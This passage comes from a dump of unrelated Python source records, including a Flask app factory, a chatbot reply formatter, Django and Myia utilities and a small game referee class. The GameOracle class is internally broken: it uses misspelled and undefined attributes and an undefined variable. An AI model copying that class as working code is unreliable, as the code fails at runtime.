start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({\n 'status':\n status,\n 'potato':\n 'I love potatoes man.'\n }),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['message'], 'success')\n\n def test_appointment_not_found(self):\n \"\"\"Tests whether requesting an appointment that doesn't exist returns\n a 404 error.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{(start + dt.timedelta(days=1)).isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(data['message'], 'No appointment was found for that '\n 'start time.')\n","sub_path":"server/project/test/appointment_handler_test.py","file_name":"appointment_handler_test.py","file_ext":"py","file_size_in_byte":24004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288859280","text":"import random\nimport re\n\nfrom . import handlers\nfrom . import research\nfrom . import imp_db\n\n\nclass Handler:\n question_type_to_handler = {\n research.classifier.QuestionType.provide_url: handlers.source_url_handler,\n research.classifier.QuestionType.additional_information: handlers.additional_info_handler,\n research.classifier.QuestionType.glossary: handlers.leak_info_handler,\n research.classifier.QuestionType.unanswerable_question: handlers.unanswerable_question_handler,\n research.classifier.QuestionType.politeness_question: handlers.politeness_handler,\n research.classifier.QuestionType.gratitude_question: handlers.gratitude_handler,\n }\n\n hello_prefixes = [\n 'Hello',\n 'Hi',\n 'Dear',\n 'Hey',\n ]\n\n seperators = [\n ',',\n ',',\n ',',\n ',',\n '.',\n '.',\n ' :) ,',\n '!',\n '!',\n ]\n\n suffixes = [\n 'Regards',\n 'Regards',\n 'Regards',\n 'Cordially',\n 'Cordially',\n 'Cordially',\n 'Cordially',\n ]\n\n autograph = [\n 'The IntSights Team',\n 'The intSights Team',\n 'The IntSights Team',\n 'The IntSights Team',\n 'The IntSights Team',\n 'The insight Team{{FIX=*The Intsights Team}}',\n 'IntSights Team',\n 'Intsights Cyber Intelligence',\n 'Intsights Cyber Intelligence',\n ]\n\n typo_regex = re.compile(\n pattern='{{FIX=(.*)}}',\n flags=re.MULTILINE,\n )\n\n def __init__(\n self,\n ):\n self.imp_db = imp_db.ImpDB()\n\n def get_answer(\n self,\n question,\n ):\n question_type = question['question_type']\n handler = self.question_type_to_handler[question_type]\n chat_username = self.imp_db.get_username(\n alert_id=question['alertId'],\n )\n\n specific_answer = handler.Handler.get_answer(\n question=question,\n )\n result_answer_template = '{hello_prefix}{seperator}\\n\\n{specific_handler_answer}\\n\\n{suffix},\\n{autograph}'\n\n if handler.Handler.config:\n if handler.Handler.config.get('remove_prefix', None):\n result_answer_template = result_answer_template.replace('{hello_prefix}{seperator}\\n\\n', '')\n if handler.Handler.config.get('remove_suffix', None):\n result_answer_template = result_answer_template.replace('\\n\\n{suffix},\\n{autograph}\\n\\n', '')\n\n result_answer = result_answer_template.format(\n hello_prefix=self.get_hello_prefix(\n chat_username=chat_username,\n ),\n seperator=random.choice(\n self.seperators,\n ),\n suffix=random.choice(\n self.suffixes,\n ),\n autograph=random.choice(\n self.autograph,\n ),\n specific_handler_answer=specific_answer,\n )\n\n if self.typo_regex.search(result_answer) is None:\n return [result_answer]\n\n result_answers = [\n self.typo_regex.sub(\n '',\n result_answer,\n ),\n ]\n for match in self.typo_regex.finditer(result_answer):\n result_answers.append(match.group(1))\n\n\n\n return result_answers\n\n def get_hello_prefix(\n self,\n chat_username,\n ):\n prefix = '{choice} {username}'\n choice = random.choice(\n self.hello_prefixes,\n )\n\n return prefix.format(\n choice=choice,\n username=chat_username,\n )\n","sub_path":"backend/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"27932180","text":"import os\nimport logging\nimport rq\n\nfrom flask import Flask, request, current_app\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_mail import Mail\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_babel import Babel, lazy_gettext as _l\nfrom elasticsearch import Elasticsearch\nfrom redis import Redis\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin = LoginManager()\nlogin.login_view = 'auth.login'\nlogin.login_message = _l('Please log in to access this page.')\nmail = Mail()\nbootstrap = Bootstrap()\nmoment = Moment()\nbabel = Babel()\n\n\ndef create_app(config_class=Config):\n app = Flask(__name__)\n app.config.from_object(config_class)\n\n db.init_app(app)\n migrate.init_app(app, db)\n login.init_app(app)\n mail.init_app(app)\n bootstrap.init_app(app)\n moment.init_app(app)\n babel.init_app(app) \n app.redis = Redis.from_url(app.config['REDIS_URL'])\n app.task_queue = rq.Queue('microblog-tasks', connection=app.redis)\n try:\n if app.config['ELASTICSEARCH_URL']:\n app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']])\n except KeyError:\n app.elasticsearch = None\n\n from app.errors import bp as errors_bp\n app.register_blueprint(errors_bp)\n\n from app.auth import bp as auth_bp\n app.register_blueprint(auth_bp, url_prefix='/auth')\n\n from app.main import bp as main_bp\n app.register_blueprint(main_bp)\n\n from app.api import bp as api_bp\n app.register_blueprint(api_bp, url_prefix='/api')\n\n class SSLSMTPHandler(SMTPHandler):\n def emit(self, record):\n \"\"\"\n Emit a record\n\n \"\"\"\n try:\n import smtplib\n from email.message import EmailMessage\n import email.utils\n\n port = self.mailport\n if not port:\n port = smtplib.SMTP_PORT\n smtp = smtplib.SMTP_SSL(self.mailhost, port, timeout=self.timeout)\n msg = EmailMessage()\n msg['From'] = self.fromaddr\n msg['To'] = ','.join(self.toaddrs)\n msg['Subject'] = self.getSubject(record)\n msg['Date'] = email.utils.localtime()\n msg.set_content(self.format(record))\n if self.username:\n smtp.login(self.username, self.password)\n smtp.auth_plain()\n smtp.send_message(msg)\n smtp.quit()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n if not app.debug and not app.testing:\n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n secure = None\n if app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = SSLSMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n # 'no-reply@' + app.config['MAIL_SERVER'], #'l1082rambler@yandex.ru'\n fromaddr='ak8647@rambler.ru',\n toaddrs=app.config['ADMINS'],\n subject='Microblog Error',\n credentials=auth,\n secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n if not os.path.exists('logs'):\n os.mkdir('logs')\n file_handler = RotatingFileHandler(\n 'logs/microblog.log', maxBytes=20480, backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n\n app.logger.setLevel(logging.INFO)\n app.logger.info('Microblog startup')\n\n return app\n\n\n@babel.localeselector\ndef get_locale():\n return request.accept_languages.best_match(current_app.config['LANGUAGES'])\n\nfrom app import models","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"142687618","text":"\nfrom Room import Room\n\nclass Alpha( Room ):\n def enter(self):\n print( \"In room Alpha\" )\n print( \"Enter either A, B, C, or D.\" )\n print( \"Enter choice: \" ) \n\n choice = input( \">> \")\n\n if choice in [ \"A\", \"B\", \"C\", \"D\" ]:\n return choice\n else:\n Alpha.wuzzup( choice )\n Alpha.enter(self)\n\n\n\n","sub_path":"RoomExercise/Alpha.py","file_name":"Alpha.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"127914333","text":"from application import app\nfrom common.libs.dataHelper import getCurrentTime\n\nimport os\n\nclass UrlManager:\n @staticmethod\n def buildUrl(path):\n config_domain = app.config[\"DOMAIN\"]\n return f\"{config_domain['www']}{path}\"\n\n @staticmethod\n def buildStaticUrl(path):\n static_path = \"/static\"+path+\"?ver=\"+UrlManager.getReleaseVersion()\n return UrlManager.buildUrl(static_path)\n\n @staticmethod\n def getReleaseVersion():\n \"\"\"\n 版本管理\n 开发模式 使用时间戳作为版本号。\n 生产模式 使用配置文件进行管理\n :return: 版本号。\n \"\"\"\n ver = getCurrentTime(\"%Y%m%d%H%M%S%f\")\n release_path = app.config.get(\"RELEASE_PATH\")\n if release_path and os.path.exists(release_path):\n with open(release_path,\"r\") as fp:\n ver = fp.read()\n\n return ver\n\n","sub_path":"common/libs/urlManager.py","file_name":"urlManager.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"563061129","text":"from threading import Thread\nimport time\n\nclass GameOracle:\n\t'''\n\tThe referee of a game. Handles player actions and the timer.\n\t'''\n\tdef __init__(self, player0, player1):\n\t\tself._gameState = GameState(player0,player1)\n\t\tself._playerNames = [player0,player1]\n\t\tself._timeLimits = [20,20]\n\t\tself._shuttingDown = False\n\t\tdef timerMain():\n\t\t\twhile not self._shuttingDown:\n\t\t\t\tcurTime = time.time()\n\t\t\t\tif self._currentActor!=None and curTime>=self.deadlines[self._currentActor]:\n\t\t\t\t\tself._gameState.performDefaultAction()\n\t\t\t\t\tself._timeLimits[self._currentActor]=max(1.0,self._timeLimits[self._currentActor]/2)\n\t\t\t\t\tself._currentActor = self._gameState.getCurrentActor()\n\t\t\t\t\tself._deadlines[self._currentActor] = curTime+self.timtLimits[self._currentActor]\n\t\t\t\ttime.sleep(1.0)\n\t\tself._timeoutActionThread = Thread(target=timerMain)\n\t\tself._timeoutActionThread.start()\n\n\tdef handlePlayerRequest(self, role, payload):\n\t\taccepted = self._gameState.performAction(role,payload)\n\t\tif accepted:\n\t\t\tself._currentActor = self._gameState.getCurrentActor()\n\t\t\tself._deadlines[self._currentActor] = curTime+self.timtLimits[self._currentActor]\n\n\tdef shutdown(self):\n\t\tself._shuttingDown = True\n\t\tself._timeoutActionThread.join()\n","sub_path":"backend/app/GameOracle.py","file_name":"GameOracle.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"205032085","text":"__author__ = 'pike'\n\n#enum ResourceType\nclass ResourceType:\n (CPU_UTIL, BANDWIDTH, DISK_IO) = ('CPU_UTIL', 'BANDWIDTH', 'DISK_IO')\n\n#enum ResourceType\nclass InstanceType:\n (ALL, MATLAB_1, MATLAB_1_MASTER, MATLAB_2, MATLAB_2_MASTER, WEB_SERVER_1, GAME_1, STORAGE_1, HADOOP) = ('ALL', 'MATLAB', 'MATLAB_MASTER', 'MATLAB_2', 'MATLAB_2_MASTER', 'WEB_SERVER_1', 'GAME', 'STORAGE_1', 'HADOOP')\n\n\n#distance between hosts\nhost_distance_matrix = [[0.5, 2, 3, 4],\n [2, 0.5, 2, 3],\n [3, 2, 0.5, 2],\n [4, 3, 2, 0.5]]\n\nhost_mapper = {'host_1' : 0, 'host_2' : 1, 'host_3' : 2, 'host_4' : 3}","sub_path":"Simulator/Conf.py","file_name":"Conf.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"598994467","text":"# encoding: utf-8\nfrom django.shortcuts import redirect\nfrom django.http import JsonResponse\nfrom functools import wraps\n\n\ndef login_required(func):\n \"\"\"验证的装饰器\n \n 缓存没有用户,而且没ajax的返回登录页面,缓存有ajax的返回403\n :param :func 不知道\n :return: 验证结果\n \"\"\"\n @wraps(func)\n def wrapper(request, *args, **kwargs):\n if request.session.get('user') is None:\n if request.is_ajax():\n return JsonResponse({'code':403,'result':[]})\n return redirect('user:login')\n return func(request, *args, **kwargs)\n\n return wrapper","sub_path":"item/dev/cmdb/utils/login_auth.py","file_name":"login_auth.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246832248","text":"\"\"\"Utilities for abstract values and inference.\"\"\"\n\nimport typing\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom itertools import chain\nfrom types import AsyncGeneratorType, GeneratorType\n\nimport numpy as np\n\nfrom .. import xtype\nfrom ..utils import (\n ADT,\n Cons,\n Empty,\n MyiaTypeError,\n TypeMismatchError,\n intern,\n is_dataclass_type,\n overload,\n)\nfrom .data import (\n ABSENT,\n ANYTHING,\n SHAPE,\n TYPE,\n VALUE,\n AbstractADT,\n AbstractArray,\n AbstractAtom,\n AbstractBottom,\n AbstractClass,\n AbstractClassBase,\n AbstractDict,\n AbstractError,\n AbstractFunction,\n AbstractJTagged,\n AbstractKeywordArgument,\n AbstractScalar,\n AbstractStructure,\n AbstractTaggedUnion,\n AbstractTuple,\n AbstractUnion,\n AbstractValue,\n JTransformedFunction,\n PartialApplication,\n Possibilities,\n TaggedPossibilities,\n TrackDict,\n)\nfrom .loop import (\n Pending,\n PendingTentative,\n find_coherent_result_sync,\n is_simple,\n)\n\n############\n# Building #\n############\n\n\ndef build_value(a, default=ABSENT):\n \"\"\"Build a concrete value out of an abstract one.\n\n A concrete value cannot be built if, for some abstract data, the inferred\n value is ANYTHING. Some types such as AbstractArray cannot be built\n either.\n\n Arguments:\n a: The abstract value.\n default: A default value to return if the value cannot be built.\n If not provided, a ValueError will be raised in those cases.\n \"\"\"\n def return_default(err):\n if default is ABSENT:\n raise err\n else:\n return default\n\n v = a.values.get(VALUE, ABSENT)\n\n if v is ANYTHING or isinstance(v, Possibilities):\n return return_default(ValueError(v))\n\n elif v is ABSENT:\n try:\n return _build_value(a)\n except ValueError as e:\n return return_default(e)\n\n elif isinstance(v, Pending):\n if v.done():\n return v.result()\n else:\n return return_default(ValueError(v))\n\n else:\n return v\n\n\n@overload\ndef _build_value(x: AbstractValue):\n raise ValueError(x)\n\n\n@overload # noqa: F811\ndef _build_value(x: AbstractTuple):\n return tuple(build_value(y) for y in x.elements)\n\n\n@overload # noqa: F811\ndef _build_value(ac: AbstractClass):\n args = {k: build_value(v) for k, v in ac.attributes.items()}\n return ac.constructor(**args)\n\n\n_default_type_params = {\n tuple: (),\n list: (object,),\n}\n\n\n@overload(bootstrap=True)\ndef type_to_abstract(self, t: xtype.TypeMeta):\n \"\"\"Convert a type to an AbstractValue.\n\n If the value is already an AbstractValue, returns it directly.\n \"\"\"\n return self[t](t)\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: AbstractValue):\n return t\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: (xtype.Number, xtype.Bool, xtype.EnvType,\n xtype.SymbolicKeyType, xtype.Nil)):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: t,\n })\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: type):\n if is_dataclass_type(t):\n fields = t.__dataclass_fields__\n attributes = {name: ANYTHING\n if isinstance(field.type, (str, type(None)))\n else self(field.type)\n for name, field in fields.items()}\n if issubclass(t, ADT):\n return AbstractADT(t, attributes)\n else:\n return AbstractClass(t, attributes)\n\n elif t is object:\n return ANYTHING\n\n else:\n return pytype_to_abstract[t](t, _default_type_params.get(t, None))\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: typing._GenericAlias):\n args = tuple(object if isinstance(arg, typing.TypeVar) else arg\n for arg in t.__args__)\n return pytype_to_abstract[t.__origin__](t, args)\n\n\n@overload # noqa: F811\ndef type_to_abstract(self, t: object):\n raise MyiaTypeError(f'{t} is not a recognized type')\n\n\n@overload\ndef pytype_to_abstract(main: tuple, args):\n \"\"\"Convert a Python type to an AbstractValue.\"\"\"\n if args == () or args is None:\n targs = ANYTHING\n elif args == ((),):\n targs = []\n else:\n targs = [type_to_abstract(a) for a in args]\n return AbstractTuple(targs)\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: list, args):\n arg, = args\n argt = type_to_abstract(arg)\n assert argt is ANYTHING\n rval = AbstractUnion([\n type_to_abstract(Empty),\n type_to_abstract(Cons)\n ])\n return rval\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: np.ndarray, args):\n arg, = args\n arg = type_to_abstract(arg)\n shp = ANYTHING\n return AbstractArray(arg, {SHAPE: shp, TYPE: xtype.NDArray})\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: int, args):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Int[64],\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: float, args):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Float[64],\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: bool, args):\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.Bool,\n })\n\n\n@overload # noqa: F811\ndef pytype_to_abstract(main: AbstractArray, args):\n return AbstractArray(\n ANYTHING,\n values={SHAPE: ANYTHING, TYPE: ANYTHING},\n )\n\n\n############\n# Checking #\n############\n\n\n@dataclass\nclass CheckState:\n \"\"\"State of abstract_check.\"\"\"\n\n cache: dict\n prop: str\n\n\n@overload.wrapper(\n initial_state=lambda: CheckState({}, None)\n)\ndef abstract_check(__call__, self, x, *args):\n \"\"\"Check that a predicate applies to a given object.\"\"\"\n def proceed():\n if prop:\n if hasattr(x, prop):\n return getattr(x, prop) is x\n elif __call__(self, x, *args):\n if isinstance(x, AbstractValue):\n setattr(x, prop, x)\n return True\n else:\n return False\n else:\n return __call__(self, x, *args)\n\n prop = self.state.prop\n cache = self.state.cache\n\n try:\n rval = cache.get(x, None)\n except TypeError:\n return proceed()\n\n if rval is None:\n cache[x] = True\n cache[x] = proceed()\n return cache[x]\n else:\n return rval\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: TrackDict, *args):\n return all(self(v, *args) for v in x.values())\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractScalar, *args):\n return self(x.values, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: AbstractStructure, *args):\n return all(self(x, *args) for x in xs.children())\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: AbstractAtom, *args):\n return True\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractFunction, *args):\n return self(x.values, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractUnion, *args):\n return self(x.options, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: Possibilities, *args):\n return all(self(v, *args) for v in x)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractTaggedUnion, *args):\n return self(x.options, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: TaggedPossibilities, *args):\n return all(self(v, *args) for _, v in x)\n\n\n@overload # noqa: F811\ndef abstract_check(self, t: PartialApplication, *args):\n return self(t.fn, *args) and all(self(v, *args) for v in t.args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, t: JTransformedFunction, *args):\n return self(t.fn, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: Pending, *args):\n return False\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: object, *args):\n return True\n\n\n###########\n# Cloning #\n###########\n\n\n@dataclass\nclass CloneState:\n \"\"\"State of abstract_clone.\"\"\"\n\n cache: dict\n prop: str\n check: callable\n\n\ndef _make_constructor(inst):\n def f(*args, **kwargs):\n inst.__init__(*args, **kwargs)\n return inst\n return f\n\n\n@overload.wrapper(\n initial_state=lambda: CloneState({}, None, None),\n postprocess=intern,\n)\ndef abstract_clone(__call__, self, x, *args):\n \"\"\"Clone an abstract value.\"\"\"\n def proceed():\n if isinstance(x, AbstractValue) and x in cache:\n return cache[x]\n result = __call__(self, x, *args)\n if not isinstance(result, GeneratorType):\n return result\n cls = result.send(None)\n if cls is not None:\n inst = cls.empty()\n else:\n inst = None\n constructor = _make_constructor(inst)\n cache[x] = inst\n try:\n result.send(constructor)\n except StopIteration as e:\n if inst is not None:\n assert e.value is inst\n return e.value\n else:\n raise AssertionError(\n 'Generators in abstract_clone must yield once, then return.'\n )\n\n cache = self.state.cache\n prop = self.state.prop\n if prop:\n if hasattr(x, prop):\n return getattr(x, prop)\n elif isinstance(x, AbstractValue):\n if self.state.check(x, *args):\n res = x\n else:\n res = proceed()\n setattr(x, prop, res)\n return res\n else:\n return proceed()\n elif self.state.check and self.state.check(x, *args):\n return x\n else:\n return proceed()\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractScalar, *args):\n return AbstractScalar(self(x.values, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractFunction, *args):\n return (yield AbstractFunction)(value=self(x.get_sync(), *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, d: TrackDict, *args):\n return {k: k.clone(v, self) for k, v in d.items()}\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractTuple, *args):\n return (yield AbstractTuple)(\n [self(y, *args) for y in x.elements],\n self(x.values, *args)\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractDict, *args):\n return (yield AbstractDict)(dict((k, self(v, *args))\n for k, v in x.entries.items()))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractArray, *args):\n return (yield type(x))(self(x.element, *args), self(x.values, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractClassBase, *args):\n return (yield type(x))(\n x.tag,\n {k: self(v, *args) for k, v in x.attributes.items()},\n values=self(x.values, *args),\n constructor=x.constructor\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractUnion, *args):\n return (yield AbstractUnion)(self(x.options, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractTaggedUnion, *args):\n return (yield AbstractTaggedUnion)(self(x.options, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractJTagged, *args):\n return (yield AbstractJTagged)(self(x.element, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractKeywordArgument, *args):\n return (yield AbstractKeywordArgument)(\n x.key,\n self(x.argument, *args)\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: Possibilities, *args):\n return Possibilities([self(v, *args) for v in x])\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: TaggedPossibilities, *args):\n return TaggedPossibilities([[i, self(v, *args)] for i, v in x])\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: PartialApplication, *args):\n return PartialApplication(\n self(x.fn, *args),\n [self(arg, *args) for arg in x.args]\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: JTransformedFunction, *args):\n return JTransformedFunction(self(x.fn, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: Pending, *args):\n if x.done():\n return self(x.result(), *args)\n else:\n return x\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: object, *args):\n return x\n\n\n##############\n# Concretize #\n##############\n\n\n@abstract_clone.variant(\n initial_state=lambda: CloneState({}, '_concrete', abstract_check)\n)\ndef concretize_abstract(self, x: Pending):\n \"\"\"Clone an abstract value while resolving all Pending (synchronous).\"\"\"\n if x.done():\n return self(x.result())\n else:\n raise AssertionError('Unresolved Pending', x)\n\n\n###############\n# Broad check #\n###############\n\n\n@abstract_check.variant(\n initial_state=lambda: CheckState(cache={}, prop='_broad')\n)\ndef _is_broad(self, x: object, *args):\n return x is ANYTHING\n\n\n@overload # noqa: F811\ndef _is_broad(self, x: (AbstractScalar, AbstractFunction), *args):\n return self(x.xvalue(), *args)\n\n\n###########\n# Broaden #\n###########\n\n\n@abstract_clone.variant(\n initial_state=lambda: CloneState({}, '_broad', _is_broad)\n)\ndef broaden(self, d: TrackDict, *args):\n \"\"\"Broaden an abstract value.\n\n * Concrete values such as 1 or True will be broadened to ANYTHING.\n\n Arguments:\n d: The abstract data to clone.\n \"\"\"\n return {k: k.broaden(v, self, *args) for k, v in d.items()}\n\n\n###################\n# Tentative check #\n###################\n\n\n@_is_broad.variant(\n initial_state=lambda: CheckState(cache={}, prop=None)\n)\ndef _is_tentative(self, x: (Possibilities, TaggedPossibilities), loop):\n return False\n\n\n#############\n# Tentative #\n#############\n\n\n@broaden.variant(\n initial_state=lambda: CloneState({}, None, _is_tentative)\n)\ndef tentative(self, p: Possibilities, loop):\n \"\"\"Broaden an abstract value and make it tentative.\n\n * Concrete values such as 1 or True will be broadened to ANYTHING.\n * Possibilities will be broadened to PendingTentative. This allows\n us to avoid resolving them earlier than we would like.\n\n Arguments:\n d: The abstract data to clone.\n loop: The InferenceLoop, used to broaden Possibilities.\n \"\"\"\n return loop.create_pending_tentative(tentative=p)\n\n\n@overload # noqa: F811\ndef tentative(self, p: TaggedPossibilities, loop):\n return loop.create_pending_tentative(tentative=p)\n\n\n###############\n# Sensitivity #\n###############\n\n\n@abstract_clone.variant\ndef sensitivity_transform(self, x: AbstractFunction):\n \"\"\"Return an abstract value for the sensitivity of x.\n\n * The sensitivity of a function is an Env\n * The sensitivity of J(x) is x\n \"\"\"\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.EnvType,\n })\n\n\n@overload # noqa: F811\ndef sensitivity_transform(self, x: AbstractJTagged):\n return self(x.element)\n\n\n#################\n# Force through #\n#################\n\n\nasync def _force_through_post(x):\n return intern(await x)\n\n\n@overload.wrapper(\n initial_state=lambda: {},\n postprocess=_force_through_post,\n)\nasync def force_through(__call__, self, x, through):\n \"\"\"Clone an abstract value (asynchronous).\"\"\"\n if not isinstance(x, through) and not isinstance(x, Pending):\n return x\n cache = self.state\n if isinstance(x, AbstractValue) and x in cache:\n return cache[x]\n\n call = __call__(self, x, through)\n if isinstance(call, AsyncGeneratorType):\n cls = await call.asend(None)\n inst = cls.empty()\n cache[x] = inst\n constructor = _make_constructor(inst)\n rval = await call.asend(constructor)\n assert rval is inst\n return rval\n else:\n return await call\n\n\n# Uncomment and test the other implementations if/when needed:\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: AbstractScalar, through):\n# return AbstractScalar(await self(x.values, through))\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: AbstractFunction, through):\n# yield (yield AbstractFunction)(*(await self(x.get_sync(), through)))\n\n\n# @overload # noqa: F811\n# async def force_through(self, d: TrackDict, through):\n# return {k: await self(v, through) for k, v in d.items()}\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractTuple, through):\n yield (yield AbstractTuple)(\n [(await self(y, through)) for y in x.elements],\n await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractArray, through):\n yield (yield type(x))(await self(x.element, through),\n await self(x.values, through))\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractClassBase, through):\n yield (yield type(x))(\n x.tag,\n {k: (await self(v, through)) for k, v in x.attributes.items()},\n values=await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractDict, through):\n yield (yield AbstractDict)(\n {k: (await self(v, through)) for k, v in x.entries.items()},\n await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractUnion, through):\n yield (yield AbstractUnion)(await self(x.options, through))\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractTaggedUnion, through):\n opts = await self(x.options, through)\n yield (yield AbstractTaggedUnion)(opts)\n\n\n@overload # noqa: F811\nasync def force_through(self, x: Possibilities, through):\n return Possibilities([await self(v, through) for v in x])\n\n\n@overload # noqa: F811\nasync def force_through(self, x: TaggedPossibilities, through):\n return TaggedPossibilities([[i, await self(v, through)] for i, v in x])\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: PartialApplication, through):\n# return PartialApplication(\n# await self(x.fn, through),\n# [await self(arg, through) for arg in x.args]\n# )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: Pending, through):\n return await self(await x, through)\n\n\n############\n# Nobottom #\n############\n\n\n@abstract_check.variant\ndef nobottom(self, x: AbstractBottom):\n \"\"\"Check whether bottom appears anywhere in this type.\"\"\"\n return False\n\n\n@overload # noqa: F811\ndef nobottom(self, x: Pending, *args):\n return True\n\n\n#########\n# Merge #\n#########\n\n\n@overload.wrapper(\n bootstrap=True,\n initial_state=dict\n)\ndef amerge(__call__, self, x1, x2, forced=False, bind_pending=True,\n accept_pending=True):\n \"\"\"Merge two values.\n\n If forced is False, amerge will return a superset of x1 and x2, if it\n exists.\n\n If the forced argument is True, amerge will either return x1 or fail.\n This makes a difference in some situations:\n\n * amerge(1, 2, forced=False) => ANYTHING\n * amerge(1, 2, forced=True) => Error\n * amerge(ANYTHING, 1234, forced=True) => ANYTHING\n * amerge(1234, ANYTHING, forced=True) => Error\n\n Arguments:\n x1: The first value to merge\n x2: The second value to merge\n forced: Whether we are already committed to returning x1 or not.\n bind_pending: Whether we bind two Pending, unresolved values.\n accept_pending: Works the same 